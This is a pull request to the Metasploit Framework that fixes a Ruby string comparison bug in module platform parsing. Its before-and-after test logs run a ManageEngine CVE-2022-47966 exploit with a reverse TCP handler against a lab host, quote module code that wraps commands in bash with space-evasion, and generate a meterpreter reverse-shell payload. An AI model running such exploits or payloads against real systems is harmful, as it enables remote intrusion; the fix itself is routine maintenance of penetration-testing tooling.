### PR TITLE
Fix module metadata platform list comparison

### DIFF
--- a/lib/msf/core/modules/metadata/obj.rb
+++ b/lib/msf/core/modules/metadata/obj.rb
@@ -295,7 +295,7 @@ class Obj
   def parse_platform_list(platform_string)
     return nil if platform_string.nil?
 
-    if platform_string.casecmp('All')
+    if platform_string.casecmp?('All')
       # empty string represents all platforms in Msf::Module::PlatformList
       platforms = ['']
     else


### PR DESCRIPTION
This fixes an issue in `Msf::Modules::Metadata::Obj#parse_platform_list`, which resulted in a wrong module compatible platform list. String comparison for platform names was done with [`#casecmp`](https://ruby-doc.org/3.0.5/String.html#method-i-casecmp), which returns -1, 0 or 1. The correct method to use is [`#casecmp?`](https://ruby-doc.org/3.0.5/String.html#method-i-casecmp-3F), which returns a boolean value.

This has been found while testing the [`multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966`](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb) module with the `Unix Command` target. Since this module has some character restrictions, an encoder is automatically selected according to the architecture and the platform. Due to this issue, the resulting encoder was `encoder/cmd/powershell_base64`, which is not compatible with `linux` payloads.

One way to show the issue is to add a breakpoint in `#execute_command` and inspect the command to be sent. 

## Before this fix
```
msf6 payload(cmd/unix/python/meterpreter/reverse_tcp) > use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
[*] Using configured payload java/shell_reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.

From: /home/msfuser/dev/src/metasploit-framework/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb:203 Msf::Modules::Exploit__Multi__Http__Manageengine_servicedesk_plus_saml_rce_cve_2022_47966::MetasploitModule#execute_command:

    198:     send_transform(transform)
    199:   end
    200:
    201:   def execute_command(cmd, _opts = {})
    202:     require 'pry';binding.pry
 => 203:     case target['Type']
    204:     when :windows_dropper
    205:       cmd = "cmd /c #{cmd}"
    206:     when :unix_cmd, :linux_dropper
    207:       cmd = cmd.gsub(' ') { '${IFS}' }
    208:       cmd = "bash -c #{cmd}"

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Manageengine_servicedesk_plus_saml_rce_cve_2022_47966::MetasploitModule>)> cmd
=> "powershell -w hidden -nop -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACcAcwB0…[SNIP]..."
```

## After this fix
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.

From: /home/msfuser/dev/src/metasploit-framework/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb:203 Msf::Modules::Exploit__Multi__Http__Manageengine_servicedesk_plus_saml_rce_cve_2022_47966::MetasploitModule#execute_command:

    198:     send_transform(transform)
    199:   end
    200:
    201:   def execute_command(cmd, _opts = {})
    202:     require 'pry';binding.pry
 => 203:     case target['Type']
    204:     when :windows_dropper
    205:       cmd = "cmd /c #{cmd}"
    206:     when :unix_cmd, :linux_dropper
    207:       cmd = cmd.gsub(' ') { '${IFS}' }
    208:       cmd = "bash -c #{cmd}"

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Manageengine_servicedesk_plus_saml_rce_cve_2022_47966::MetasploitModule>)> cmd
=> "/bin/echo -ne \\\\\\x65\\\\\\x63\\\\\\x68\\\\\\x6f\\\\\\x20\\\\\\x65\\\\\\x78\\\\\\x65…[SNIP]..."
```

Another way to verify if the issue is fixed is to generate a payload forcing the encoding:
## Before this fix
```
msf6 payload(cmd/unix/python/meterpreter/reverse_tcp) > generate -E
# cmd/unix/python/meterpreter/reverse_tcp - 524 bytes (stage
# 1)
# https://metasploit.com/
# Encoder: cmd/powershell_base64
…[SNIP]...
```

## After this fix
```
msf6 payload(cmd/unix/python/meterpreter/reverse_tcp) > generate -E
# cmd/unix/python/meterpreter/reverse_tcp - 524 bytes (stage
# 1)
# https://metasploit.com/
# Encoder: cmd/echo
…[SNIP]...
```
